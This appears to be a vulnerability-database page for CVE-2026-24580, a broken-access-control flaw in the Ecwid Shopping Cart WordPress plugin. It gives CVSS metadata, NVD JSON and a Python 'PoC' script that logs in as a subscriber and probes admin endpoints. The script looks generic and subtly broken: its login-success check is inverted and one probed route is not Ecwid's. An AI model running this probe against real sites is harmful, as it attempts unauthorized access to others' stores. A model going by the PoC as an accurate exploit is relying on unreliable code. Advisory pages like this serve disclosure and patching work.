Security Vulnerability Report
中文
CVE-2026-24580 CVSS 4.3 MEDIUM

CVE-2026-24580

Published: 2026-01-23 15:16:16
Last Modified: 2026-04-28 15:16:17

Description

Missing Authorization vulnerability in Ecwid by Lightspeed Ecommerce Shopping Cart Ecwid Shopping Cart ecwid-shopping-cart allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Ecwid Shopping Cart: from n/a through <= 7.0.5.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Ecwid Shopping Cart <= 7.0.5
WordPress Ecwid Shopping Cart Plugin (n/a through 7.0.5)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2026-24580 PoC - Broken Access Control in Ecwid Shopping Cart # Target: WordPress site with Ecwid Shopping Cart plugin <= 7.0.5 def exploit_cve_2026_24580(target_url, username, password): """ Exploit missing authorization vulnerability in Ecwid Shopping Cart This PoC demonstrates accessing admin functions with low-privilege user """ session = requests.Session() # Step 1: Login with low-privilege user (subscriber role) login_url = f"{target_url}/wp-login.php" login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': '1' } print(f"[*] Logging in as low-privilege user: {username}") response = session.post(login_url, data=login_data) if 'wp-admin' not in response.url and 'error' not in response.url.lower(): print("[+] Login successful") else: print("[-] Login failed") return False # Step 2: Try to access Ecwid admin functionality (should require higher privileges) ecwid_admin_endpoints = [ '/wp-admin/admin.php?page=ecwid-shopping-cart', '/wp-admin/admin-ajax.php?action=ecwid_ajax_admin', '/wp-json/wp/v2/settings', ] print("[*] Attempting to access protected Ecwid admin functions...") for endpoint in ecwid_admin_endpoints: url = target_url + endpoint response = session.get(url) # Check if access is granted without proper authorization if response.status_code == 200 and 'ecwid' in response.text.lower(): print(f"[CRITICAL] {url} - Access granted without proper authorization!") print(f"[INFO] Response contains sensitive Ecwid admin data") return True else: print(f"[-] {url} - Access denied or not vulnerable") return False if __name__ == "__main__": if len(sys.argv) != 4: print(f"Usage: python {sys.argv[0]} <target_url> <username> <password>") print(f"Example: python {sys.argv[0]} http://example.com subscriber password123") sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] exploit_cve_2026_24580(target, user, pwd)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24580", "sourceIdentifier": "[email protected]", "published": "2026-01-23T15:16:15.903", "lastModified": "2026-04-28T15:16:16.557", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Ecwid by Lightspeed Ecommerce Shopping Cart Ecwid Shopping Cart ecwid-shopping-cart allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Ecwid Shopping Cart: from n/a through <= 7.0.5."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en Ecwid por Lightspeed Ecommerce Shopping Cart Ecwid Shopping Cart ecwid-shopping-cart permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Ecwid Shopping Cart: desde n/a hasta &lt;= 7.0.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/ecwid-shopping-cart/vulnerability/wordpress-ecwid-shopping-cart-plugin-7-0-5-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}